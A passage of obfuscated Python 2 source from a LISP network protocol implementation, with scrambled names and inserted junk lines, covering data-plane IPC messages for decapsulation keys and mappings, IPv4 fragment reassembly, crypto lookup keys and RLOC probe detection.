if 23 - 23: Oo0Ooo / II111iiii % OOooOOo % iII111i - Oo0Ooo / OoO0O00
if 7 - 7: Ii1I / I11i / II111iiii % I11i * I11i + iIii1I11I1II1
if 6 - 6: iIii1I11I1II1 * oO0o - iIii1I11I1II1 . O0 . O0
if 96 - 96: I1Ii111 * II111iiii % i11iIiiIii - oO0o
if 32 - 32: i11iIiiIii * o0oOOo0O0Ooo . OoooooooOO / O0
def lisp_write_ipc_decap_key ( rloc_addr , keys ) :
if ( lisp_i_am_itr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 14 - 14: i11iIiiIii . I1Ii111 % I1ii11iIi11i . I1ii11iIi11i % IiII
if 93 - 93: iIii1I11I1II1 / IiII
if 91 - 91: i11iIiiIii % ooOoO0o - iII111i * I1Ii111 . i11iIiiIii
if 1 - 1: IiII + iIii1I11I1II1 * I1ii11iIi11i - IiII - i1IIi
if ( keys == None or len ( keys ) == 0 or keys [ 1 ] == None ) : return
if 75 - 75: II111iiii * o0oOOo0O0Ooo / I1ii11iIi11i
iI1Ii1iiiII1II = keys [ 1 ] . encrypt_key
II1iI = keys [ 1 ] . icv_key
if 46 - 46: OOooOOo
if 67 - 67: OoO0O00 . I11i % OOooOOo + Oo0Ooo
if 40 - 40: OoO0O00 / I11i % iIii1I11I1II1 - ooOoO0o
if 51 - 51: Oo0Ooo % iIii1I11I1II1 % oO0o + o0oOOo0O0Ooo
i1II1iIiiiIi = rloc_addr . split ( ":" )
if ( len ( i1II1iIiiiIi ) == 1 ) :
iIiiiIIiii = { "type" : "decap-keys" , "rloc" : i1II1iIiiiIi [ 0 ] }
else :
iIiiiIIiii = { "type" : "decap-keys" , "rloc" : i1II1iIiiiIi [ 0 ] , "port" : i1II1iIiiiIi [ 1 ] }
if 12 - 12: OoooooooOO / OoooooooOO * Ii1I % OOooOOo + i11iIiiIii % OoooooooOO
iIiiiIIiii = lisp_build_json_keys ( iIiiiIIiii , iI1Ii1iiiII1II , II1iI , "decrypt-key" )
if 46 - 46: II111iiii / I1Ii111 / O0 * OoooooooOO * ooOoO0o / ooOoO0o
lisp_write_to_dp_socket ( iIiiiIIiii )
return
if 74 - 74: i11iIiiIii - oO0o % II111iiii . iIii1I11I1II1
if 94 - 94: OOooOOo + oO0o / OoooooooOO + o0oOOo0O0Ooo - o0oOOo0O0Ooo . OOooOOo
if 15 - 15: i11iIiiIii * O0 % iIii1I11I1II1 . OoooooooOO % oO0o + o0oOOo0O0Ooo
if 37 - 37: oO0o + O0 . IiII * I1ii11iIi11i
if 2 - 2: O0 . ooOoO0o
if 97 - 97: i1IIi . Oo0Ooo
if 81 - 81: OoOoOO00
if 81 - 81: O0
def lisp_build_json_keys ( entry , ekey , ikey , key_type ) :
if ( ekey == None ) : return ( entry )
if 57 - 57: oO0o - o0oOOo0O0Ooo % i11iIiiIii / OoOoOO00 . iIii1I11I1II1
entry [ "keys" ] = [ ]
iII1 = { "key-id" : "1" , key_type : ekey , "icv-key" : ikey }
entry [ "keys" ] . append ( iII1 )
return ( entry )
if 68 - 68: iII111i
if 59 - 59: O0 - i11iIiiIii + OoooooooOO - iII111i - Oo0Ooo . OoooooooOO
if 60 - 60: O0 * iIii1I11I1II1 - Ii1I * II111iiii . ooOoO0o
if 61 - 61: I1IiiI . iII111i
if 19 - 19: iIii1I11I1II1 * Oo0Ooo - I1IiiI - I1IiiI + O0 - I1Ii111
if 56 - 56: I1Ii111 - i1IIi + I11i . i1IIi / II111iiii * oO0o
if 70 - 70: ooOoO0o - II111iiii . I11i
def lisp_write_ipc_database_mappings ( ephem_port ) :
if ( lisp_i_am_etr == False ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 70 - 70: OOooOOo / iII111i - I11i + OoOoOO00 % Ii1I * IiII
if 26 - 26: O0 / oO0o
if 96 - 96: ooOoO0o * iII111i . IiII
if 77 - 77: OOooOOo - I11i % o0oOOo0O0Ooo
iIiiiIIiii = { "type" : "database-mappings" , "database-mappings" : [ ] }
if 46 - 46: I1IiiI % oO0o . OoooooooOO . IiII / I11i - i1IIi
if 43 - 43: OoOoOO00 - o0oOOo0O0Ooo
if 22 - 22: i1IIi
if 33 - 33: O0
for o00o0oOo0o0O in lisp_db_list :
if ( o00o0oOo0o0O . eid . is_ipv4 ( ) == False and o00o0oOo0o0O . eid . is_ipv6 ( ) == False ) : continue
i11OO0Ooo0O0oO0O = { "instance-id" : str ( o00o0oOo0o0O . eid . instance_id ) ,
"eid-prefix" : o00o0oOo0o0O . eid . print_prefix_no_iid ( ) }
iIiiiIIiii [ "database-mappings" ] . append ( i11OO0Ooo0O0oO0O )
if 13 - 13: I11i . I1ii11iIi11i - i11iIiiIii - o0oOOo0O0Ooo
lisp_write_to_dp_socket ( iIiiiIIiii )
if 56 - 56: I1Ii111
if 23 - 23: iIii1I11I1II1 - i1IIi % i1IIi * i11iIiiIii
if 40 - 40: I1ii11iIi11i + OoO0O00
if 8 - 8: i11iIiiIii - iIii1I11I1II1
if 73 - 73: OoOoOO00
iIiiiIIiii = { "type" : "etr-nat-port" , "port" : ephem_port }
lisp_write_to_dp_socket ( iIiiiIIiii )
return
if 25 - 25: iII111i / oO0o
if 61 - 61: OoooooooOO . Ii1I . I11i + oO0o
if 73 - 73: II111iiii % i11iIiiIii * I1ii11iIi11i + O0
if 61 - 61: I1IiiI / OOooOOo
if 67 - 67: OoOoOO00
if 22 - 22: Ii1I * I1ii11iIi11i * o0oOOo0O0Ooo - I1IiiI . i11iIiiIii
if 30 - 30: O0 / oO0o * i11iIiiIii + iIii1I11I1II1 + O0 % I1IiiI
def lisp_write_ipc_interfaces ( ) :
if ( lisp_i_am_etr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 95 - 95: ooOoO0o % OOooOOo
if 17 - 17: i1IIi + Ii1I
if 35 - 35: iIii1I11I1II1 - Oo0Ooo - OoooooooOO % I1ii11iIi11i
if 27 - 27: Oo0Ooo * II111iiii - OOooOOo + o0oOOo0O0Ooo
iIiiiIIiii = { "type" : "interfaces" , "interfaces" : [ ] }
if 26 - 26: oO0o / I1ii11iIi11i - oO0o
for I1i in lisp_myinterfaces . values ( ) :
if ( I1i . instance_id == None ) : continue
i11OO0Ooo0O0oO0O = { "interface" : I1i . device ,
"instance-id" : str ( I1i . instance_id ) }
iIiiiIIiii [ "interfaces" ] . append ( i11OO0Ooo0O0oO0O )
if 9 - 9: ooOoO0o * iIii1I11I1II1 * OoooooooOO
if 13 - 13: iII111i . i11iIiiIii * o0oOOo0O0Ooo . iII111i
lisp_write_to_dp_socket ( iIiiiIIiii )
return
if 96 - 96: Ii1I
if 90 - 90: II111iiii
if 93 - 93: i11iIiiIii / Ii1I * Oo0Ooo . iII111i % iII111i / IiII
if 15 - 15: OoOoOO00 % I1Ii111 - iIii1I11I1II1
if 52 - 52: i11iIiiIii * ooOoO0o
if 15 - 15: OoooooooOO . oO0o . i11iIiiIii / o0oOOo0O0Ooo
if 91 - 91: ooOoO0o
if 47 - 47: II111iiii + I11i + ooOoO0o % Oo0Ooo / iII111i
if 9 - 9: O0 + IiII
if 69 - 69: I1IiiI
if 11 - 11: I11i % I1Ii111 + O0 . Ii1I . I1ii11iIi11i % I1Ii111
if 28 - 28: IiII . o0oOOo0O0Ooo + iII111i - OoOoOO00 / OOooOOo
if 86 - 86: ooOoO0o * OoOoOO00 + oO0o / II111iiii % OOooOOo
if 89 - 89: O0 * Ii1I / OoO0O00 / OoOoOO00 % iII111i * iIii1I11I1II1
def lisp_parse_auth_key ( value ) :
iII1ii1IiII = value . split ( "[" )
oo0o0 = { }
if ( len ( iII1ii1IiII ) == 1 ) :
oo0o0 [ 0 ] = value
return ( oo0o0 )
if 19 - 19: I1ii11iIi11i
if 42 - 42: OoOoOO00 / IiII
for IIoOo0000oooooo in iII1ii1IiII :
if ( IIoOo0000oooooo == "" ) : continue
OO000o00 = IIoOo0000oooooo . find ( "]" )
o0O = IIoOo0000oooooo [ 0 : OO000o00 ]
try : o0O = int ( o0O )
except : return
if 65 - 65: ooOoO0o - ooOoO0o * OoO0O00
oo0o0 [ o0O ] = IIoOo0000oooooo [ OO000o00 + 1 : : ]
if 99 - 99: I11i % ooOoO0o . I1Ii111
return ( oo0o0 )
if 34 - 34: ooOoO0o + oO0o + II111iiii . I1Ii111 . i1IIi
if 14 - 14: OoO0O00 . ooOoO0o - i1IIi * I1IiiI
if 24 - 24: iIii1I11I1II1 / I1Ii111
if 16 - 16: OoOoOO00 * I1Ii111 - I1IiiI / I1Ii111
if 64 - 64: I1ii11iIi11i . i1IIi % II111iiii % Oo0Ooo + oO0o - I1IiiI
if 24 - 24: IiII . II111iiii . II111iiii . OoOoOO00 . i11iIiiIii
if 11 - 11: Ii1I
if 82 - 82: I11i - i1IIi . Oo0Ooo * I1Ii111
if 44 - 44: iII111i
if 56 - 56: II111iiii / Oo0Ooo % IiII * II111iiii - iIii1I11I1II1 + ooOoO0o
if 33 - 33: o0oOOo0O0Ooo . I11i / I1IiiI
if 29 - 29: o0oOOo0O0Ooo - ooOoO0o
if 59 - 59: I11i / IiII * OoO0O00 / IiII . I1Ii111
if 82 - 82: OOooOOo . iIii1I11I1II1 + I1Ii111
if 14 - 14: IiII . i11iIiiIii
if 17 - 17: ooOoO0o % ooOoO0o * oO0o
def lisp_reassemble ( packet ) :
iIIi1 = socket . ntohs ( struct . unpack ( "H" , packet [ 6 : 8 ] ) [ 0 ] )
if 8 - 8: ooOoO0o + OoO0O00 . II111iiii / iIii1I11I1II1 - OOooOOo
if 87 - 87: iIii1I11I1II1 . IiII % I1IiiI . OoO0O00 - I1Ii111
if 53 - 53: I1Ii111 % i11iIiiIii
if 99 - 99: I1IiiI - i1IIi * i11iIiiIii + OoO0O00
if ( iIIi1 == 0 or iIIi1 == 0x4000 ) : return ( packet )
if 80 - 80: o0oOOo0O0Ooo . I11i % iIii1I11I1II1 + OoOoOO00
if 87 - 87: I1Ii111 + II111iiii / I1ii11iIi11i + OoOoOO00
if 71 - 71: I1IiiI + iIii1I11I1II1 + O0 * iII111i % IiII
if 42 - 42: OOooOOo - I1ii11iIi11i
OOoOo = socket . ntohs ( struct . unpack ( "H" , packet [ 4 : 6 ] ) [ 0 ] )
O000o0 = socket . ntohs ( struct . unpack ( "H" , packet [ 2 : 4 ] ) [ 0 ] )
if 82 - 82: OOooOOo . Oo0Ooo * ooOoO0o % II111iiii % II111iiii - oO0o
OoooOOOOO0 = ( iIIi1 & 0x2000 == 0 and ( iIIi1 & 0x1fff ) != 0 )
iIiiiIIiii = [ ( iIIi1 & 0x1fff ) * 8 , O000o0 - 20 , packet , OoooOOOOO0 ]
if 36 - 36: O0 / I1ii11iIi11i + iII111i * Oo0Ooo
if 97 - 97: IiII * O0 - o0oOOo0O0Ooo
if 77 - 77: II111iiii / I11i % OoooooooOO % I1IiiI % II111iiii
if 99 - 99: Oo0Ooo
if 30 - 30: OoOoOO00 + I1Ii111 . OoOoOO00 - I11i
if 42 - 42: OoOoOO00
if 77 - 77: Oo0Ooo * IiII * I1ii11iIi11i + IiII
if 37 - 37: IiII . OoooooooOO - i11iIiiIii * I1ii11iIi11i - OOooOOo
if ( iIIi1 == 0x2000 ) :
O0o0oOOO , IIi11 = struct . unpack ( "HH" , packet [ 20 : 24 ] )
O0o0oOOO = socket . ntohs ( O0o0oOOO )
IIi11 = socket . ntohs ( IIi11 )
if ( IIi11 not in [ 4341 , 8472 , 4789 ] and O0o0oOOO != 4341 ) :
lisp_reassembly_queue [ OOoOo ] = [ ]
iIiiiIIiii [ 2 ] = None
if 74 - 74: Ii1I + i11iIiiIii * iII111i / o0oOOo0O0Ooo . i11iIiiIii
if 99 - 99: OOooOOo - OoooooooOO + OoooooooOO . OOooOOo
if 37 - 37: IiII - iIii1I11I1II1 * i11iIiiIii . ooOoO0o
if 78 - 78: OOooOOo - I1ii11iIi11i + iII111i % OoOoOO00
if 28 - 28: I11i + i1IIi / i11iIiiIii * OOooOOo * II111iiii
if 78 - 78: OoO0O00 - i1IIi % I1Ii111
if ( lisp_reassembly_queue . has_key ( OOoOo ) == False ) :
lisp_reassembly_queue [ OOoOo ] = [ ]
if 87 - 87: I11i
if 37 - 37: iII111i . I1Ii111 - iII111i - I11i - iIii1I11I1II1 - II111iiii
if 80 - 80: I1Ii111 % O0 - IiII / II111iiii + i1IIi
if 4 - 4: OOooOOo + II111iiii
if 1 - 1: OoooooooOO * I1Ii111 - I11i / IiII
iiiI1IIi111i = lisp_reassembly_queue [ OOoOo ]
if 60 - 60: iIii1I11I1II1 . o0oOOo0O0Ooo . IiII
if 66 - 66: OoooooooOO - I11i % i11iIiiIii / OoO0O00
if 34 - 34: O0 * iIii1I11I1II1 . o0oOOo0O0Ooo . I1Ii111 . iIii1I11I1II1 * iIii1I11I1II1
if 38 - 38: iIii1I11I1II1
if 83 - 83: iII111i - Ii1I . oO0o - I1Ii111 * o0oOOo0O0Ooo
if ( len ( iiiI1IIi111i ) == 1 and iiiI1IIi111i [ 0 ] [ 2 ] == None ) :
dprint ( "Drop non-LISP encapsulated fragment 0x{}" . format ( lisp_hex_string ( OOoOo ) . zfill ( 4 ) ) )
if 70 - 70: i11iIiiIii - OoO0O00 / i11iIiiIii
return ( None )
if 46 - 46: II111iiii + O0 * OoooooooOO
if 39 - 39: OoooooooOO % II111iiii . o0oOOo0O0Ooo
if 29 - 29: I11i . o0oOOo0O0Ooo . i1IIi . o0oOOo0O0Ooo
if 77 - 77: iIii1I11I1II1 + iIii1I11I1II1
if 52 - 52: I1ii11iIi11i - IiII % I1IiiI % i1IIi
iiiI1IIi111i . append ( iIiiiIIiii )
iiiI1IIi111i = sorted ( iiiI1IIi111i )
if 98 - 98: I1Ii111 + II111iiii % OoO0O00 % iII111i
if 54 - 54: II111iiii . ooOoO0o . iII111i - I1IiiI
if 97 - 97: oO0o - O0 / II111iiii * II111iiii - oO0o * IiII
if 97 - 97: IiII % OoO0O00 . OoOoOO00 - Ii1I
O0o00o000oO = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
O0o00o000oO . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
IiIiI1I1iii = O0o00o000oO . print_address_no_iid ( )
O0o00o000oO . address = socket . ntohl ( struct . unpack ( "I" , packet [ 16 : 20 ] ) [ 0 ] )
IIIIIII1IiIii = O0o00o000oO . print_address_no_iid ( )
O0o00o000oO = red ( "{} -> {}" . format ( IiIiI1I1iii , IIIIIII1IiIii ) , False )
if 100 - 100: oO0o . ooOoO0o
dprint ( "{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}" . format ( bold ( "Received" , False ) , " non-LISP encapsulated" if iIiiiIIiii [ 2 ] == None else "" , O0o00o000oO , lisp_hex_string ( OOoOo ) . zfill ( 4 ) ,
# IiII
# II111iiii . I1IiiI % iIii1I11I1II1
lisp_hex_string ( iIIi1 ) . zfill ( 4 ) ) )
if 72 - 72: iIii1I11I1II1 - I1IiiI * OoO0O00 * o0oOOo0O0Ooo - I1IiiI . I1ii11iIi11i
if 46 - 46: i1IIi . OoOoOO00 . I1Ii111
if 84 - 84: OoOoOO00 * OoOoOO00 % o0oOOo0O0Ooo * II111iiii
if 28 - 28: ooOoO0o % OoOoOO00 + ooOoO0o
if 68 - 68: II111iiii
if ( iiiI1IIi111i [ 0 ] [ 0 ] != 0 or iiiI1IIi111i [ - 1 ] [ 3 ] == False ) : return ( None )
O0O0o0O00O = iiiI1IIi111i [ 0 ]
for Iii1I in iiiI1IIi111i [ 1 : : ] :
iIIi1 = Iii1I [ 0 ]
o0Oo0O , III1i = O0O0o0O00O [ 0 ] , O0O0o0O00O [ 1 ]
if ( o0Oo0O + III1i != iIIi1 ) : return ( None )
O0O0o0O00O = Iii1I
if 64 - 64: I1ii11iIi11i * II111iiii % oO0o % Oo0Ooo * OoOoOO00 * iIii1I11I1II1
lisp_reassembly_queue . pop ( OOoOo )
if 41 - 41: OoO0O00 . I11i % OoO0O00
if 13 - 13: I1ii11iIi11i + II111iiii . OOooOOo . ooOoO0o - IiII % O0
if 69 - 69: Oo0Ooo / ooOoO0o * i11iIiiIii
if 11 - 11: OoOoOO00 * OoooooooOO
if 40 - 40: iIii1I11I1II1
packet = iiiI1IIi111i [ 0 ] [ 2 ]
for Iii1I in iiiI1IIi111i [ 1 : : ] : packet += Iii1I [ 2 ] [ 20 : : ]
if 46 - 46: II111iiii
dprint ( "{} fragments arrived for packet 0x{}, length {}" . format ( bold ( "All" , False ) , lisp_hex_string ( OOoOo ) . zfill ( 4 ) , len ( packet ) ) )
if 24 - 24: OOooOOo % OOooOOo * iII111i . Oo0Ooo * OOooOOo
if 52 - 52: I11i
if 46 - 46: Oo0Ooo % oO0o - I1IiiI + Ii1I
if 54 - 54: OoOoOO00 / ooOoO0o - I1IiiI
if 37 - 37: o0oOOo0O0Ooo
iI1 = socket . htons ( len ( packet ) )
iIIIIII = packet [ 0 : 2 ] + struct . pack ( "H" , iI1 ) + packet [ 4 : 6 ] + struct . pack ( "H" , 0 ) + packet [ 8 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : 20 ]
if 57 - 57: iII111i / i1IIi / i1IIi + IiII
if 75 - 75: IiII / O0
iIIIIII = lisp_ip_checksum ( iIIIIII )
return ( iIIIIII + packet [ 20 : : ] )
if 72 - 72: I11i
if 35 - 35: I11i % OoooooooOO / i1IIi * i1IIi / I1IiiI
if 42 - 42: I11i - i1IIi - oO0o / I11i + Ii1I + ooOoO0o
if 23 - 23: OoOoOO00 . oO0o - iII111i
if 27 - 27: Oo0Ooo * OOooOOo - OoOoOO00
if 1 - 1: II111iiii * i11iIiiIii . OoooooooOO
if 37 - 37: OoooooooOO + O0 . I11i % OoOoOO00
if 57 - 57: I1Ii111 . OOooOOo + I1Ii111 . iIii1I11I1II1 / oO0o / O0
def lisp_get_crypto_decap_lookup_key ( addr , port ) :
oOo0O = addr . print_address_no_iid ( ) + ":" + str ( port )
if ( lisp_crypto_keys_by_rloc_decap . has_key ( oOo0O ) ) : return ( oOo0O )
if 88 - 88: I1Ii111
oOo0O = addr . print_address_no_iid ( )
if ( lisp_crypto_keys_by_rloc_decap . has_key ( oOo0O ) ) : return ( oOo0O )
if 16 - 16: Oo0Ooo . ooOoO0o / OoO0O00 / o0oOOo0O0Ooo . OoooooooOO * OoO0O00
if 50 - 50: II111iiii + I11i . OoooooooOO . I1Ii111 - OOooOOo
if 83 - 83: oO0o
if 100 - 100: I1Ii111 + o0oOOo0O0Ooo * oO0o / oO0o . oO0o + iII111i
if 71 - 71: II111iiii + iII111i + O0 % Oo0Ooo / I1IiiI
for OOOooOO in lisp_crypto_keys_by_rloc_decap :
O0o00O0Oo0 = OOOooOO . split ( ":" )
if ( len ( O0o00O0Oo0 ) == 1 ) : continue
O0o00O0Oo0 = O0o00O0Oo0 [ 0 ] if len ( O0o00O0Oo0 ) == 2 else ":" . join ( O0o00O0Oo0 [ 0 : - 1 ] )
if ( O0o00O0Oo0 == oOo0O ) :
O0000 = lisp_crypto_keys_by_rloc_decap [ OOOooOO ]
lisp_crypto_keys_by_rloc_decap [ oOo0O ] = O0000
return ( oOo0O )
if 29 - 29: iII111i
if 91 - 91: Oo0Ooo - IiII
return ( None )
if 47 - 47: iII111i / OOooOOo + iII111i
if 69 - 69: I1IiiI . I1ii11iIi11i
if 18 - 18: I11i * I1IiiI
if 42 - 42: i1IIi . I1Ii111 - ooOoO0o + I11i / oO0o
if 60 - 60: i1IIi + OoooooooOO % i11iIiiIii / IiII % Oo0Ooo + I1IiiI
if 87 - 87: Ii1I % OoooooooOO % I1Ii111 * i11iIiiIii * OoOoOO00
if 78 - 78: I11i
if 62 - 62: iIii1I11I1II1 . o0oOOo0O0Ooo . ooOoO0o % oO0o % O0 % oO0o
if 51 - 51: Oo0Ooo / IiII - Oo0Ooo
if 71 - 71: I11i * I1ii11iIi11i * OOooOOo * o0oOOo0O0Ooo
if 53 - 53: I1IiiI % I1IiiI
def lisp_build_crypto_decap_lookup_key ( addr , port ) :
addr = addr . print_address_no_iid ( )
OOoo00oOO = addr + ":" + str ( port )
if 33 - 33: O0 * I11i * ooOoO0o / OoOoOO00 % IiII - I1IiiI
if ( lisp_i_am_rtr ) :
if ( lisp_rloc_probe_list . has_key ( addr ) ) : return ( addr )
if 15 - 15: II111iiii . O0 . iIii1I11I1II1 / O0 - oO0o
if 9 - 9: i1IIi + o0oOOo0O0Ooo - Ii1I . oO0o + ooOoO0o
if 65 - 65: OoooooooOO / IiII
if 81 - 81: OoOoOO00 - I1IiiI
if 90 - 90: oO0o
if 9 - 9: Ii1I / O0 - II111iiii - i1IIi + OoOoOO00
for oOOo0O0O in lisp_nat_state_info . values ( ) :
for O00oO0ooo in oOOo0O0O :
if ( addr == O00oO0ooo . address ) : return ( OOoo00oOO )
if 8 - 8: Ii1I + I11i * oO0o % I11i
if 17 - 17: o0oOOo0O0Ooo + Oo0Ooo
return ( addr )
if 38 - 38: oO0o + I1IiiI + OOooOOo
return ( OOoo00oOO )
if 82 - 82: iIii1I11I1II1 . OOooOOo
if 7 - 7: i11iIiiIii . I11i
if 56 - 56: iIii1I11I1II1 - II111iiii * i1IIi / Ii1I
if 65 - 65: OOooOOo / I1IiiI . OoooooooOO + I1IiiI + OoooooooOO + i11iIiiIii
if 20 - 20: I1IiiI + iII111i + O0 * O0
if 18 - 18: I11i - I11i . OoOoOO00 . ooOoO0o
if 31 - 31: ooOoO0o
def lisp_set_ttl ( lisp_socket , ttl ) :
try :
lisp_socket . setsockopt ( socket . SOL_IP , socket . IP_TTL , ttl )
except :
lprint ( "socket.setsockopt(IP_TTL) not supported" )
pass
if 87 - 87: OoooooooOO + OOooOOo - I1ii11iIi11i / I1IiiI + ooOoO0o - Oo0Ooo
return
if 19 - 19: ooOoO0o + I1ii11iIi11i - ooOoO0o
if 17 - 17: I11i * i1IIi + iIii1I11I1II1 % I1IiiI
if 44 - 44: IiII + I1IiiI . Ii1I % Oo0Ooo
if 97 - 97: O0
if 95 - 95: OoO0O00 % iII111i / I1IiiI * OoooooooOO
if 31 - 31: iIii1I11I1II1
if 62 - 62: o0oOOo0O0Ooo - iII111i / II111iiii . o0oOOo0O0Ooo
def lisp_is_rloc_probe_request ( lisp_type ) :
lisp_type = struct . unpack ( "B" , lisp_type ) [ 0 ]
return ( lisp_type == 0x12 )
if 20 - 20: iIii1I11I1II1 % OOooOOo
if 91 - 91: ooOoO0o
if 96 - 96: I1IiiI . OOooOOo
if 94 - 94: OoooooooOO + II111iiii % ooOoO0o - II111iiii / O0
if 34 - 34: IiII % oO0o
if 54 - 54: I1IiiI
if 80 - 80: OoOoOO00 . I1IiiI / I1ii11iIi11i . iII111i
def lisp_is_rloc_probe_reply ( lisp_type ) :
lisp_type = struct . unpack ( "B" , lisp_type ) [ 0 ]
return ( lisp_type == 0x28 )
if 31 - 31: I11i * o0oOOo0O0Ooo
if 17 - 17: Ii1I * iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo - IiII
if 78 - 78: i11iIiiIii . o0oOOo0O0Ooo
if 72 - 72: Oo0Ooo % II111iiii + O0 * OoOoOO00 - OOooOOo + I1Ii111
if 23 - 23: I1IiiI - O0 - iII111i . II111iiii / oO0o
if 1 - 1: I11i . OOooOOo / oO0o % I11i * Oo0Ooo + Oo0Ooo
if 23 - 23: Ii1I % i1IIi - I1Ii111
if 95 - 95: OoOoOO00 - ooOoO0o . i1IIi . OoooooooOO
if 38 - 38: I1IiiI + I1ii11iIi11i - Oo0Ooo . i11iIiiIii - i1IIi
if 11 - 11: IiII / I1IiiI . I1IiiI
if 87 - 87: OoooooooOO * OoO0O00 * iIii1I11I1II1
if 16 - 16: o0oOOo0O0Ooo * I11i + OoooooooOO + O0 / iIii1I11I1II1
if 60 - 60: Ii1I % IiII * OoooooooOO * ooOoO0o * Ii1I
if 8 - 8: I1Ii111 - o0oOOo0O0Ooo
if 52 - 52: OoOoOO00 % O0 + I1ii11iIi11i . i11iIiiIii
if 59 - 59: Ii1I - I1Ii111 . ooOoO0o - OoOoOO00 + oO0o . OoO0O00
if 88 - 88: OOooOOo - ooOoO0o * o0oOOo0O0Ooo . OoooooooOO
if 3 - 3: I1Ii111
def lisp_is_rloc_probe ( packet , rr ) :
O0OO0ooO00 = ( struct . unpack ( "B" , packet [ 9 ] ) [ 0 ] == 17 )
if ( O0OO0ooO00 == False ) : return ( [ packet , None , None , None ] )
if 24 - 24: Ii1I + i11iIiiIii * I1Ii111 - OoOoOO00 / Ii1I - OoOoOO00
O0o0oOOO = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
IIi11 = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
O0oOOOooo = ( socket . htons ( LISP_CTRL_PORT ) in [ O0o0oOOO , IIi11 ] )
if ( O0oOOOooo == False ) : return ( [ packet , None , None , None ] )
if 52 - 52: o0oOOo0O0Ooo - i1IIi + OoOoOO00 / IiII
if ( rr == 0 ) :
Ii1I11IiI1I1 = lisp_is_rloc_probe_request ( packet [ 28 ] )
if ( Ii1I11IiI1I1 == False ) : return ( [ packet , None , None , None ] )
elif ( rr == 1 ) :
Ii1I11IiI1I1 = lisp_is_rloc_probe_reply ( packet [ 28 ] )
if ( Ii1I11IiI1I1 == False ) : return ( [ packet , None , None , None ] )
elif ( rr == - 1 ) :
Ii1I11IiI1I1 = lisp_is_rloc_probe_request ( packet [ 28 ] )
if ( Ii1I11IiI1I1 == False ) :
Ii1I11IiI1I1 = lisp_is_rloc_probe_reply ( packet [ 28 ] )
if ( Ii1I11IiI1I1 == False ) : return ( [ packet , None , None , None ] )
if 24 - 24: IiII + OoooooooOO * Ii1I % iIii1I11I1II1
if 22 - 22: I1Ii111 - I1ii11iIi11i . Ii1I + o0oOOo0O0Ooo * OoooooooOO % iIii1I11I1II1
if 87 - 87: OoO0O00 + o0oOOo0O0Ooo
if 46 - 46: oO0o + OoOoOO00
if 17 - 17: Ii1I . Oo0Ooo - oO0o % OOooOOo
if 59 - 59: O0
O0O00Oo = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
O0O00Oo . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
if 75 - 75: o0oOOo0O0Ooo / OoooooooOO . I1ii11iIi11i * oO0o * I11i / OoooooooOO
if 17 - 17: Ii1I % I1ii11iIi11i + I11i
if 80 - 80: i1IIi . OoooooooOO % OoooooooOO . oO0o / OOooOOo
if 85 - 85: OOooOOo
if ( O0O00Oo . is_local ( ) ) : return ( [ None , None , None , None ] )
if 80 - 80: ooOoO0o % O0 % I1ii11iIi11i + Oo0Ooo
if 82 - 82: oO0o / iIii1I11I1II1 % ooOoO0o . Ii1I / i1IIi - I1Ii111
if 15 - 15: I11i - OOooOOo . II111iiii . iIii1I11I1II1
if 93 - 93: I11i + o0oOOo0O0Ooo / OOooOOo + Ii1I % Oo0Ooo % I1ii11iIi11i
O0O00Oo = O0O00Oo . print_address_no_iid ( )
IIi1I1iII111 = socket . ntohs ( struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ] )
oo0OOoOO0 = struct . unpack ( "B" , packet [ 8 ] ) [ 0 ] - 1
packet = packet [ 28 : : ]
if 72 - 72: IiII / II111iiii
O0OooO0oo = bold ( "Receive(pcap)" , False )
iI1IiI11Ii11i = bold ( "from " + O0O00Oo , False )
iIiiI11II11 = lisp_format_packet ( packet )
lprint ( "{} {} bytes {} {}, packet: {}" . format ( O0OooO0oo , len ( packet ) , iI1IiI11Ii11i , IIi1I1iII111 , iIiiI11II11 ) )
if 25 - 25: i1IIi + OoOoOO00 + oO0o + OoooooooOO
return ( [ packet , O0O00Oo , IIi1I1iII111 , oo0OOoOO0 ] )
if 21 - 21: I1ii11iIi11i
if 60 - 60: i1IIi / OoO0O00 . Ii1I
if 16 - 16: i11iIiiIii + OoOoOO00 % Oo0Ooo + I1ii11iIi11i * Ii1I / I1Ii111
if 26 - 26: iII111i
if 31 - 31: iII111i
if 45 - 45: OoO0O00
if 55 - 55: iIii1I11I1II1 % iIii1I11I1II1 + I11i - ooOoO0o + I1IiiI * O0
if 47 - 47: ooOoO0o + iIii1I11I1II1 * OOooOOo . I1IiiI . o0oOOo0O0Ooo
if 49 - 49: Oo0Ooo . OoOoOO00 * OOooOOo
if 86 - 86: IiII * OOooOOo + Ii1I
if 62 - 62: I11i
def lisp_ipc_write_xtr_parameters ( cp , dp ) :
if ( lisp_ipc_dp_socket == None ) : return
if 86 - 86: Oo0Ooo % II111iiii + I1Ii111 / I1ii11iIi11i
oOO0O = { "type" : "xtr-parameters" , "control-plane-logging" : cp ,
"data-plane-logging" : dp , "rtr" : lisp_i_am_rtr }
if 15 - 15: I1IiiI / I1Ii111 % iII111i
lisp_write_to_dp_socket ( oOO0O )
return
if 57 - 57: I1Ii111 . iIii1I11I1II1 / Oo0Ooo / IiII / iII111i * OoOoOO00
if 35 - 35: i1IIi + I1Ii111 - ooOoO0o . I1ii11iIi11i + Oo0Ooo
if 43 - 43: oO0o . OoO0O00 * i1IIi
if 1 - 1: ooOoO0o / i1IIi
if 42 - 42: I1ii11iIi11i * ooOoO0o + OoOoOO00 % I1ii11iIi11i . IiII
if 75 - 75: OoO0O00 * i1IIi - OOooOOo % II111iiii % OoO0O00 - OoOoOO00
if 75 - 75: I11i * IiII * ooOoO0o
if 31 - 31: Ii1I
def lisp_external_data_plane ( ) :
OoOoOoo0OoO0 = 'egrep "ipc-data-plane = yes" ./lisp.config'
